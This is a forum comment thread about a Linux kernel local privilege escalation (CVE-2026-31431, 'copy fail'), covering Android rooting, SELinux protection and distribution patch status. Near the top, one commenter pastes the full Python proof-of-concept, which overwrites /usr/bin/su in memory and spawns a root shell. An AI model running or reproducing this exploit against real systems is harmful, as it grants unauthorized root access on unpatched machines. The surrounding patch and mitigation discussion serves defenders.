You must log in or # to comment.
here is just the code https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
#!/usr/bin/env python3 import os as g,zlib,socket as s def d(x):return bytes.fromhex(x) def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u.recv(8+t) except:0 f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) while i<len(e):c(f,i,e[i:i+4]);i+=4 g.system("su")So could this root any android device to make it possible to install homebrew on it?
There usually isn’t a
subinary installed on non-rooted Androids. If you’re rooting it yourself anyways, there’s no need to use the exploit.I’m not as smart as the people who make alternative android options. I was just hoping it would help them jailbreak more of goggle’s bullshit so customers actually have a choice to go for an android OS which respects them and their privacy.
grapheneOS has already vented on social media that theu are not affected because of how they configured SELinux and that the headline is therefore not correct
SELinux breaks a lot of android root exploits, way back in the day even dirty cow didn’t work. It would get you “root” but not actually the full perms because of SELinux. Really good testament to the added security of MAC, it’s one of the reasons I run apparmor on my systems
I’ll be happy if I never have to look at SELinux or fapolicy ever again. Especially fapolicy because the documentation is shit.
It’s the one thing I don’t miss about being a sysadmin.
Aww dang it
Well ok who tf cares I can literally just connect to adb over localhost with termux and do adb root
Apparently this exact PoC only works on x86. You’d need to find an ARM version
It seems that most LTS distros didn’t get a heads up and there are no patches available. Uh oh.
Automated test suites became so good, many regular people can just use rolling release distros these days.
That may be true for personal computers, but the impact of this vulnerability is mainly on servers. And those typically run distros like Debian, Ubuntu, RHEL that didn’t have a patch at that time.
the impact of this vulnerability is mainly on servers
The impact is any Linux install without root access for its users.
Sure, but it’s much easier to get some form of RCE on public hosts in order to make practical use of the LPE.
What I read said the patch was merged into main on April 1st, so they should have.
It looks like the fixes were merged in 6.18, 6.19, and 7.0. But all older (but supported) LTS kernels didn’t have the fix, like 6.12, which is used in Debian 13. And it also seems that Ubuntu, RHEL, and SUSE had not picked up the patches in their kernel versions.
The kernel 6.12.73-1 used by Debian Trixie is still vulnerable. Applying security updates should update the kernel to 6.12.85-1 and fix the issue.
https://security-tracker.debian.org/tracker/CVE-2026-31431
Edit: Kernel 6.1.170-1 just got released and fixes the vulnerability.
A mitigation that worked for me - https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/26
Here on my Artix* Linux it still asks for the password; *OpenRC
systemd, KDE Plasma, Wayland.https://xint.io/blog/copy-fail-linux-distributions
according to this (good) blog post the disclosure to the linux kernel security team was already like a month ago so i would imagine the fix is already on a lot of systems
If your system is up-to-date, your kernel has probably already been patched. The patch was added to mainline on April 1, and I think every major distribution will have added it by now.